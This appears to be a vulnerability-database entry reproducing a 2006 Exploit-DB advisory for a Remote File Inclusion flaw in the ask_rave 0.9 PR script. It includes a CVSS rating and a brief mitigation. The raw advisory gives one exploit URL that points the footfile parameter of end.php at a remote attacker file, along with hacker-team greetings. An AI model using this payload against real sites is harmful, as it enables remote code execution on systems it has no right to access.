ask_rave (RFI)

vendor:

ask_rave

by:

v1per-haCker

7,5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: ask_rave

Affected Version From: 0.9 PR

Affected Version To: 0.9 PR

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

A Remote File Inclusion (RFI) vulnerability exists in the ask_rave script. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system.

Mitigation:

Ensure that user input is validated and filtered before being used in file operations.

Source

Exploit-DB raw data:

#==================================================================
#  ask_rave (RFI)
#==================================================================
# Info:-
#
# Scripts:  ask_rave
# Download: http://rave.jk-digital.com/site/scripts/files/ask_0_9PR.zip
# Version : 0.9 PR
# Dork & vuln : download scripts and think :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/end.php?footfile=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#               ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#           metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero
#And all members in XP10_hackEr Team
#Thanx to str0ke :)
#WWW.XP10.COM
#
===================================================================

# milw0rm.com [2006-10-26]